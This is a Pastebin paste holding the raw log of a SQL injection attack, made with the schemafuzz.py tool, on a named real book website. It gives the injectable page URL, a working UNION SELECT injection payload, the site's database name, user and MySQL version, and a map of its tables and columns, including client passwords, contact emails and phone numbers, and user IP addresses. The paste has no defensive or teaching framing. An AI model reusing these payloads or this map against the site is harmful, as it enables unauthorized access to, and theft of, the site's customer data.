sauzadeace

www.seaofstories.com

Jun 4th, 2012
118
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.23 KB | None | 0 0
  1. |---------------------------------------------------------------|
  2. | rsauron[@]gmail[dot]com v5.0 |
  3. | 6/2008 schemafuzz.py |
  4. | -MySQL v5+ Information_schema Database Enumeration |
  5. | -MySQL v4+ Data Extractor |
  6. | -MySQL v4+ Table & Column Fuzzer |
  7. | Usage: schemafuzz.py [options] |
  8. | -h help darkc0de.com |
  9. |---------------------------------------------------------------|
  10.  
  11. [+] URL:http://www.seaofstories.com/title.php?id=5193--
  12. [+] Evasion Used: "+" "--"
  13. [+] 01:33:11
  14. [+] Proxy Not Given
  15. [+] Attempting To find the number of columns...
  16. [+] Testing: 0,1,2,3,
  17. [+] Column Length is: 4
  18. [+] Found null column at column #: 1
  19. [+] SQLi URL: http://www.seaofstories.com/title.php?id=5193+AND+1=2+UNION+SELECT+0,1,2,3--
  20. [+] darkc0de URL: http://www.seaofstories.com/title.php?id=5193+AND+1=2+UNION+SELECT+0,darkc0de,2,3
  21. [-] Done!
  22.  
  23. |---------------------------------------------------------------|
  24. | rsauron[@]gmail[dot]com v5.0 |
  25. | 6/2008 schemafuzz.py |
  26. | -MySQL v5+ Information_schema Database Enumeration |
  27. | -MySQL v4+ Data Extractor |
  28. | -MySQL v4+ Table & Column Fuzzer |
  29. | Usage: schemafuzz.py [options] |
  30. | -h help darkc0de.com |
  31. |---------------------------------------------------------------|
  32.  
  33. [+] URL:http://www.seaofstories.com/title.php?id=5193+AND+1=2+UNION+SELECT+0,darkc0de,2,3--
  34. [+] Evasion Used: "+" "--"
  35. [+] 01:34:06
  36. [+] Proxy Not Given
  37. [+] Gathering MySQL Server Configuration...
  38. Database: seaofstories
  39. User: seaofstories@localhost
  40. Version: 5.0.95
  41. [+] Number of tables names to be fuzzed: 338
  42. [+] Number of column names to be fuzzed: 249
  43. [+] Searching for tables and columns...
  44.  
  45. [+] Found a table called: book
  46.  
  47. [+] Now searching for columns inside table "book"
  48. [!] Found a column called:id
  49. [-] Done searching inside table "book" for columns!
  50.  
  51. [+] Found a table called: client
  52.  
  53. [+] Now searching for columns inside table "client"
  54. [!] Found a column called:password
  55. [!] Found a column called:id
  56. [-] Done searching inside table "client" for columns!
  57.  
  58. [+] Found a table called: contact
  59.  
  60. [+] Now searching for columns inside table "contact"
  61. [!] Found a column called:id
  62. [!] Found a column called:email
  63. [!] Found a column called:phone
  64. [-] Done searching inside table "contact" for columns!
  65.  
  66. [+] Found a table called: newsletter
  67.  
  68. [+] Now searching for columns inside table "newsletter"
  69. [!] Found a column called:id
  70. [-] Done searching inside table "newsletter" for columns!
  71.  
  72. [+] Found a table called: test
  73.  
  74. [+] Now searching for columns inside table "test"
  75. [!] Found a column called:id
  76. [-] Done searching inside table "test" for columns!
  77.  
  78. [+] Found a table called: user
  79.  
  80. [+] Now searching for columns inside table "user"
  81. [!] Found a column called:ip_address
  82. [-] Done searching inside table "user" for columns!
  83.  
  84. [-] [02:35:48]
  85. [-] Total URL Requests 1833
  86. [-] Done
  87.  
  88. sauzadeace
Add Comment
Please, Sign In to add comment